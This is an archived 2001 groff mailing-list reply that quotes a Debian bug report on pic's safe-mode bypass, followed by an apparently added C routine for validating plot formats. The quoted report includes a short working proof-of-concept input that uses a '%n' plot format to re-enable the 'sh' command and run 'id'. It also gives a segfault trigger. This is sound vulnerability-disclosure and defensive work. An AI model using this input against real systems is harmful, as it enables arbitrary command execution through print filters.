
[Groff] Re: Bug#107459: pic can be forced to run commands in safe mode


From: Colin Watson
Subject: [Groff] Re: Bug#107459: pic can be forced to run commands in safe mode
Date: Thu, 2 Aug 2001 12:38:57 +0100
User-agent: Mutt/1.2.5i

On Thu, Aug 02, 2001 at 11:36:37AM +0200, Arnaud Giersch wrote:
> Package: groff
> Version: 1.15.2-1
> 
> pic can be forced to execute commands (sh X..X) when running in safe
> mode (-S). It can be exploited through lpd when groff/pic is run in
> print filters, and arbitrary commands with id of lpd can be run.
> 
> pic command 'plot -1.99854281554743185012 "%n"' will overwrite memory
> where safe mode variable is stored and then it allows to use "sh"
> command.
> 
> How to reproduce:
> 
> pic -S > /dev/null << EOT
> .PS
> plot -1.99854281554743185012 "%n"
> sh Xid >&2X
> .PE
> EOT
> 
> Actual Results: uid=1000(giersch) gid=300(parallel) ...
> 
> Expected Results: pic:<standard input>:3: unsafe to run command `id >&2'
> 
> The bug has been discovered by Zenith Parsec <address@hidden>.  Exploit
> with patch has been posted to bugtraq:
>         http://www.securityfocus.com/bid/3103
> 
> I've made a patched version for the Potato (groff_1.15.2-1.ag)
> available at:
>         http://arnaud.giersch.free.fr/debian/
> 
> As far as I can see in the sources, the other versions (Woody and Sid)
> are vulnerable too.

Hi,

Are you aware of this problem? I haven't seen any traffic about it here.
Although I haven't yet managed to overwrite the correct bit of memory to
make the exploit work, I've got pic 1.17.2 to segfault by varying plot's
first argument, which is a good indication that something's wrong. The
relevant code in 1.15.2 and 1.17.2 seems largely identical.

At the very least, this should reliably segfault:

  $ pic -S >/dev/null
  .PS
  plot 0 "%n"

Thanks,

-- 
Colin Watson                                  address@hidden
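The report above describes a user-supplied format string reaching a printf-style formatter, where a `%n` directive turns a number-formatting request into a memory write. As an added illustration of the defensive check a formatter like pic's `plot` needs (example code written for this page, not groff's own fix; `plot_format_is_safe` and `plot_format_number` are hypothetical names), the validator below accepts only a single floating-point conversion with optional flags, width and precision, plus literal `%%`, and rejects everything else before the string ever reaches `snprintf`:

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Returns 1 if fmt is a format a plot-style command could safely hand to
 * printf-style formatting of one double: exactly one conversion from
 * {e,E,f,g,G}, optional flags/width/precision, "%%" for a literal percent.
 * Anything else (%n, %s, %x, length modifiers such as %lf, "*" widths,
 * a dangling "%", a second conversion) is rejected. */
int plot_format_is_safe(const char *fmt)
{
    int conversions = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                       /* "%%": literal percent sign */
            continue;
        while (*p && strchr("-+ #0", *p))    /* flags */
            p++;
        while (isdigit((unsigned char)*p))   /* field width */
            p++;
        if (*p == '.') {                     /* precision */
            p++;
            while (isdigit((unsigned char)*p))
                p++;
        }
        if (!*p || !strchr("eEfgG", *p))     /* not a plain double conversion */
            return 0;
        if (++conversions > 1)               /* one argument, one conversion */
            return 0;
    }
    return conversions == 1;
}

/* Formats value with fmt only after it passed the check. On a rejected
 * format the output is a fixed "%g" rendering and the return value is -1,
 * so the caller can diagnose the bad format instead of executing it.
 * Returns 0 on success, -1 on rejection or truncation. */
int plot_format_number(char *out, size_t outlen, const char *fmt, double value)
{
    if (!plot_format_is_safe(fmt)) {
        snprintf(out, outlen, "%g", value);
        return -1;
    }
    int n = snprintf(out, outlen, fmt, value);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}
```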
